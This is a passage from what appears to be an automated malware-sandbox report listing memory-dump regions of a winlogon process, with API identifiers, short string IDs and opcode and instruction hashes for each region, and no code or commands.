                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: b8fe504bb407258c64da02a96ca7c5ba8b0e93a1ad385a2ab9df165d35783e3f
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: FC02FC3A219B94D6EBA0CB59F49435AB7A0F3C5795F104416EA8E87BA8DF7CC445CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 1ffdf77440144320880841716a0512793572cc22953dbc9cff7090dbbc4ba5bb
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: 7B02DA36219F9496E760CB99F49435AB7B0F3C4795F208016EA8E87BA8DF7DC494CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: 239365e036b6f85965a45bd8f1f20c39413e71112a752a4d373e0fd63fd9046a
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 3B51B439204E21E7E365CF9EE44865A73A0F788B86F60C519DD4A47B94DF38C845CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: 1008572df6bdbce857969eaecfe603bf8008a31496c7d74fbc8725216b4a41b3
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 9151D639654E21A7E365DF9EE44865AB3E0F788B86F60C119ED4E83754DF38C846CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: 367f64ed0c0295eef91848d0396296509a590e13b71d415c66fd2df6aef77ac4
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: 6751B63921CE62A7E765CF9EE84861A73A1F788B8AF608159DD4B43754DF38D845CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: a47289baa3d87ba33f1f88afe4474dab606a4d653d033b248626fe1d2762ccbb
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: FA51C53D214E61E7E765CFAEE84861A73A4F788F86F508519DE4A47B94DF38C845CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: 54ae065566b4829b781d9018a566345e36c50bff607e782f17c6b7fee4cb4d2a
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: EC51C539254E61A7E765CF9EE84865AB7A1F788B86F608119DE4E83754DF38C805CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                          • Instruction ID: f391407adbabd6f055ae27f7376641b3a5a98cb01709d5bad2178826b4988af3
                                                          • Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                          • Instruction Fuzzy Hash: 8E61FC7A12CF50D6E7A0CB99E44831AB7A0F388B4AF108155FA8E43BA8DB7DC544CF01
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: df420bfb6b8bdc2ea69683aacb40dbca2f3a3f392b7c08502304e7a5998fc663
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: 0561067A129F90D6E760CB99E45831AB7A0F388789F108516FA8D87BE8DB7DC541CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: 2cef1711cbef8828fa7d648f6754db2e6d58f1b8963c7f3555853ad98ac6ec36
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: FF61C97A129F54D6E760CB99E55831AB7E0F388749F208116FA8E87BA8DB7DC540CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: b218463dee67502a835ae951813035202606197bf057287b7ca0e680a927a5f0
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 60118F2A604B50A3FB24CBA9E40820AA7B0FB44B85F548436DE4D03BE4EB7EC944C781
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: c8547797954554ffa4e78551a709827f54cf49ca4e02fd7e96956fd5fd9b6fc5
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 6011822A618B50A3EB64CB69E40824AA7B1FB58B82F148036EE4D43794EB7DC944C780
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 4ae307845288fb3d062ff6b21d3b2bdd9a53696f29506425ff8a95e7ae8c6e8c
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 3951B23A31EE20AADB54CB9DE44CB6D7791E358B99F14C261DA4B87788DB79C842C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: e3f065706f0033cd9b367c7da221b193a0613518b7070d47f270ab554b71a793
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 5A51C73A311E20AADB54CB9DD44CB6C7791F758B9AF14CA11EA4957BC8E778CC42C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 2212d634079747aafaa89bb439a841dab367c477c17d881e86c43961d0c77b4d
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: 5351C63A311E20EADB54DB9DE44CB6C7791F358B9AF24C221DA4A87788DB79C842C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 05d6541485a4cde5682c01a5d603653128390d7577d40c8f6b44cab3c99e28d3
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 3461CE7A50CFC4A5EB318F59E4443DAB7A0F785B99F148215EB9A13B9ADB3CC091CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 8c8bc4a70ab599d9620bd1be4db269998e674a49f348e955b95b8174a160fc55
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 1B51923A10CB50BBEBB48F99954C35877A1F354F96F24C196EA8A47BD6CB38C451C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 2695b427674d9b1f0b090cd8166b492a7e798804cf5713d6c1bd31e74a038d40
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: D261AD3A508BC491EB20CF69E44479AB7A0F785B99F149A15EB9813F9ADB7CC191CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: 9600a415d1908e86b08cbf43e1cb8adef971c7a7c32f46f5b13ec36b108122a0
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 5951C33A200BA0EBEB748FA9D54835877A0F354F96F24E616EA9947FD6CB38C451C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: e2d1a1c78e90f6bd31deacbcec7c4600ee4de40aa8066d79be5c97a9c682ef8a
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: CA61D276508FD495DB30CF59E44439AB7A0F784B85F248216EBD853B9ADB3CC095CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
